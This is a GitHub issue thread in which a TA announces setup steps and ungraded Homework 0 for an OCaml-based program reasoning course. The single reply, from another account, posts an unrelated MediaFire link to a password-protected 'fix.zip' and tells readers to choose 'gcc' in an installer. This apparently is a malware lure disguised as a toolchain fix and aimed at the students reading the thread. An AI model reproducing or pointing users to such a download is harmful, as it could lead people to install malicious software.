### ISSUE TITLE
[Announcement] Setup & Homework 0

### ISSUE THREAD

**Issue by spearo2** [prosyslab-classroom/cs424-program-reasoning#396]
Greetings, everyone.
I am Changgong Lee, the TA of the course CS424 for this semester.

First off, we welcome you and wish you all the best in your academic endeavors this semester. 
We hope you will find this course both engaging and rewarding as you work toward your goals.

Here are few stuffs you must set up for this course

## Setup

1. Submit your GitHub account: https://forms.gle/HtFdH8EDqijHp79A8

2. Join the [Gradescope](https://www.gradescope.com/). 
We have sent the invitation mail based on the KLMS attendance book.
We will send it again on 9/9 (Tue). If you didn't get the invitation, please register the course and wait until the course registration period ends (add/drop period).

3. Students will use OCaml and several tools for programming assignments. Here is the setup guide
[Guide for setup and OCaml programming](https://docs.google.com/presentation/d/1rS39M1dui3khqTc6joWniNrxH3x87nGgOrWHiMAL4DU)
KCLOUD VM, one of your choices for the working environment, is not prepared yet.
The KCLOUD VM will only be available after the course registration period finishes.

Once you are done with the setups, we have prepared **_HW0_** for you to get used to the class environment.
## Homework 0
**_Homework 0_** includes two programming exercises and one writing.

**Here are the GitHub classroom links for each assignment:**

Homework 0-1: https://classroom.github.com/a/DtRFOy1_
Homework 0-2: https://classroom.github.com/a/i9-roqdu
Homework 0-3: https://classroom.github.com/a/iH73KkYv
***Note that HW0 is not mandatory, but is intended to help you get started with the course smoothly.**

### Homework 0-1 & 0-2:
Homework 0-1 and 0-2 are programming exercises for those unfamiliar with OCaml and Git.

Feel free to skip these assignments if you are already used to both.

There are no deadlines because we won't grade them.

### Homework 0-3
Homework 0-3 is a writing assignment.

Watch the video([KR](https://www.youtube.com/watch?v=oippSXvxUlw&feature=youtu.be), [EN](https://www.youtube.com/watch?v=HeQX2HjkcNo&t=2)) explaining undecidability, and write a critique about it.

You should submit it at [Gradescope](https://www.gradescope.com/) in PDF format.

This assignment is due 9.13(Fri). As mentioned above, this is not graded. However, if you are aiming for a reward, be sure to submit it before the due date.

If you have any questions, feel free to ask the TA.

Thanks.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
